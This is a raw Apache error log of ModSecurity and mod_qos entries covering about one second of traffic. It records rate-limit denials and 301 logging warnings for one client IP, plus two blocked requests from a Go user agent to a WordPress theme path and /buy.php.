[Tue May 26 20:00:44.368036 2026] [security2:error] [pid 112029:tid 112182] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6rQAAASE"]
[Tue May 26 20:00:44.368431 2026] [security2:error] [pid 112029:tid 112235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6tQAAAVY"]
[Tue May 26 20:00:44.371318 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mKwAAAIk"]
[Tue May 26 20:00:44.383328 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mDgAAAOM"]
[Tue May 26 20:00:44.392824 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mUQAAAME"]
[Tue May 26 20:00:44.393110 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1meQAAAIo"]
[Tue May 26 20:00:44.395138 2026] [security2:error] [pid 112029:tid 112229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6swAAAVA"]
[Tue May 26 20:00:44.396272 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mUAAAAOw"]
[Tue May 26 20:00:44.396289 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mdQAAAOk"]
[Tue May 26 20:00:44.399886 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mfwAAAIw"]
[Tue May 26 20:00:44.406681 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mggAAAMw"]
[Tue May 26 20:00:44.412887 2026] [security2:error] [pid 112029:tid 112269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6sAAAAXg"]
[Tue May 26 20:00:44.417586 2026] [security2:error] [pid 112029:tid 112160] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6yAAAAQs"]
[Tue May 26 20:00:44.421019 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mlgAAAQE"]
[Tue May 26 20:00:44.431648 2026] [security2:error] [pid 112029:tid 112169] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6xQAAARQ"]
[Tue May 26 20:00:44.434069 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1megAAANI"]
[Tue May 26 20:00:44.448708 2026] [security2:error] [pid 112029:tid 112180] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6wQAAAR8"]
[Tue May 26 20:00:44.563223 2026] [qos:error] [pid 112029:tid 112252] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulKFW0C-ajaCsyFc7FAAAAWc
[Tue May 26 20:00:44.563698 2026] [qos:error] [pid 112029:tid 112243] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulKFW0C-ajaCsyFc7FQAAAV4
[Tue May 26 20:00:44.659777 2026] [qos:error] [pid 106517:tid 106670] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nKAAAAJk
[Tue May 26 20:00:44.663362 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nKQAAAO0
[Tue May 26 20:00:44.664687 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nKgAAAPM
[Tue May 26 20:00:44.667241 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nKwAAANI
[Tue May 26 20:00:44.673141 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nLQAAAPA
[Tue May 26 20:00:44.673805 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nLgAAALw
[Tue May 26 20:00:44.674040 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nLwAAAM4
[Tue May 26 20:00:44.674432 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:46386] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nMAAAANw
[Tue May 26 20:00:44.718639 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nMwAAAJY
[Tue May 26 20:00:44.720086 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nNAAAAOE
[Tue May 26 20:00:44.781722 2026] [security2:error] [pid 106517:tid 106755] [client 103.163.220.53:22443] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/theme-check/main.php"] [unique_id "ahWulIZZc2DoU1lPnP1nNgAAAO0"]
[Tue May 26 20:00:44.843899 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nOgAAANI
[Tue May 26 20:00:44.843964 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nOQAAAPM
[Tue May 26 20:00:44.845066 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nPAAAAM4
[Tue May 26 20:00:44.845207 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nOwAAALw
[Tue May 26 20:00:44.853512 2026] [qos:error] [pid 106517:tid 106753] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nPgAAAOs
[Tue May 26 20:00:44.854374 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:46386] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nPwAAANw
[Tue May 26 20:00:44.858112 2026] [qos:error] [pid 106517:tid 106756] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nQAAAAO4
[Tue May 26 20:00:44.861634 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nQQAAAJY
[Tue May 26 20:00:44.875206 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nQgAAAOE
[Tue May 26 20:00:44.895296 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulIZZc2DoU1lPnP1nRAAAAMU
[Tue May 26 20:00:45.036438 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nTwAAAKo
[Tue May 26 20:00:45.036441 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nTQAAAO0
[Tue May 26 20:00:45.036553 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nTgAAAKY
[Tue May 26 20:00:45.037116 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nUAAAAMc
[Tue May 26 20:00:45.040887 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:46386] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nUQAAANI
[Tue May 26 20:00:45.043254 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nUgAAAM4
[Tue May 26 20:00:45.046135 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nUwAAAJc
[Tue May 26 20:00:45.047013 2026] [qos:error] [pid 106517:tid 106753] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nVAAAAOs
[Tue May 26 20:00:45.049376 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nVQAAANw
[Tue May 26 20:00:45.068651 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nVgAAAOE
[Tue May 26 20:00:45.184288 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nWwAAAKo
[Tue May 26 20:00:45.185502 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nXQAAAMc
[Tue May 26 20:00:45.185770 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nXAAAAKY
[Tue May 26 20:00:45.188160 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nXgAAANs
[Tue May 26 20:00:45.192787 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:46386] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nXwAAANI
[Tue May 26 20:00:45.195641 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nYAAAAM4
[Tue May 26 20:00:45.197385 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nYQAAAJc
[Tue May 26 20:00:45.202331 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nZAAAANw
[Tue May 26 20:00:45.206739 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nZQAAAOE
[Tue May 26 20:00:45.223504 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nZwAAAIY
[Tue May 26 20:00:45.280828 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mewAAANM"]
[Tue May 26 20:00:45.293919 2026] [security2:error] [pid 112029:tid 112184] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6ugAAASM"]
[Tue May 26 20:00:45.295299 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc61QAAATo"]
[Tue May 26 20:00:45.304570 2026] [security2:error] [pid 112029:tid 112177] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6wwAAARw"]
[Tue May 26 20:00:45.305185 2026] [security2:error] [pid 112029:tid 112274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc63QAAAX0"]
[Tue May 26 20:00:45.310436 2026] [security2:error] [pid 112029:tid 112170] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6wAAAARU"]
[Tue May 26 20:00:45.314246 2026] [security2:error] [pid 112029:tid 112192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6ywAAASs"]
[Tue May 26 20:00:45.318543 2026] [security2:error] [pid 112029:tid 112281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6xwAAAYQ"]
[Tue May 26 20:00:45.333105 2026] [security2:error] [pid 112029:tid 112181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc62QAAASA"]
[Tue May 26 20:00:45.334819 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mlwAAAMo"]
[Tue May 26 20:00:45.337275 2026] [security2:error] [pid 112029:tid 112172] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc60QAAARc"]
[Tue May 26 20:00:45.353280 2026] [security2:error] [pid 112029:tid 112173] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc62wAAARg"]
[Tue May 26 20:00:45.364256 2026] [security2:error] [pid 112029:tid 112254] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7AQAAAWk"]
[Tue May 26 20:00:45.365819 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m1QAAAK4"]
[Tue May 26 20:00:45.367030 2026] [security2:error] [pid 112029:tid 112185] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6wgAAASQ"]
[Tue May 26 20:00:45.368409 2026] [security2:error] [pid 106517:tid 106768] [client 103.163.220.45:63001] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/buy.php"] [unique_id "ahWulYZZc2DoU1lPnP1nbQAAAPo"]
[Tue May 26 20:00:45.372658 2026] [security2:error] [pid 112029:tid 112248] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7AAAAAWM"]
[Tue May 26 20:00:45.372727 2026] [security2:error] [pid 112029:tid 112162] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc60AAAAQ0"]
[Tue May 26 20:00:45.373780 2026] [security2:error] [pid 112029:tid 112189] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6ygAAASg"]
[Tue May 26 20:00:45.387871 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m1gAAANA"]
[Tue May 26 20:00:45.388826 2026] [security2:error] [pid 112029:tid 112282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc65wAAAYU"]
[Tue May 26 20:00:45.388950 2026] [security2:error] [pid 112029:tid 112178] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc62AAAAR0"]
[Tue May 26 20:00:45.393444 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m2QAAAMI"]
[Tue May 26 20:00:45.395463 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m1wAAAJg"]
[Tue May 26 20:00:45.412041 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m_AAAALg"]
[Tue May 26 20:00:45.418943 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m1AAAAOU"]
[Tue May 26 20:00:45.436156 2026] [security2:error] [pid 112029:tid 112261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc64AAAAXA"]
